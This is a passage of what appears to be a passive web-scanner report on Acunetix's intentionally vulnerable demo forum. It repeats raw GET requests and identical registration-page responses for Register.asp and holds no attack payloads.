align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=18 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=19 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=20 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:54 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D20" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D21" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=22 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D22" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:55 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D23" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> 